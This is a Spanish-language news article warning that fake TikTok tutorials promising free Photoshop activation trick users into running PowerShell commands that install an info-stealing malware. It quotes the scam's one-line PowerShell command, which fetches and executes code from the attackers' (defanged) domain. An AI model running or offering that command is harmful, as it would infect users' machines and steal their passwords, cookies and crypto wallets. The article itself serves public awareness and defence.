¿Cómo opera está nueva estafa en TikTok? [Pexels]
¡No creas todo lo que ves en TikTok! Aunque existen muchos tutoriales que te pueden ayudar a realizar trámites o aprender a usar programas, ahora los ciberdelincuentes también ocupan la plataforma con el propósito de distribuir un malware capaz de robar tu información e incluso dinero. Así lo dio a conocer Xavier Mertens, un consultor independiente de ciberseguridad en SANS Technology Institute.
De acuerdo con Mertens, los ciberdelincuentes realizan este tipo de vídeos, engañando a los usuarios bajo la premisa de que les enseñaran una forma sencilla para activar programas de forma gratuita como Photoshop; pero en cambio, es una nueva estafa en la que los supuestos tutoriales se convierten en ataques similares al ClickFix.
Así funciona la nueva estafa que circula en TikTok
Se les pide a las víctimas que inicien PowerShell como administrador y ejecuten un comando de una sola línea “iex (irm slmgr[.]win/photoshop)”. Lejos de instalar una versión gratuita del programa prometido, los usuarios obtienen un fragmento de código malicioso que infecta el dispositivo y conecta con el sitio remoto slmgr win para recuperar y ejecutar otro Script de PowerShell, que descarga dos ejecutables, uno de ellos una variante del malware de robo de información, AuraSteeler.

El malware AuraSteeler es clave en esta estafa, recopila toda tu información bajo demanda durante su ejecución y roba tus credenciales de acceso y contraseñas guardadas en los navegadores, las cookies de autenticación e incluso billeteras de criptomonedas de los usuarios.
¿Qué hacer en caso de ser víctima de esta nueva estafa, que roba tus datos?
Bleeping Computer advierte que si se cae en uno de estos videos, lo mejor que puede hacer la víctima es cambiar inmediatamente todas sus contraseñas, pues sus credenciales podrían ser robadas.
Toma en cuenta también mantener tus equipos protegidos con herramientas de seguridad actualizadas.

VER TAMBIÉN Top 5 de búsquedas que nunca deberías hacer en Google, según expertos
Estas cinco búsquedas en Google pueden parecer inofensivas, pero esconden trampas digitales que comprometen tu seguridad, según especialistas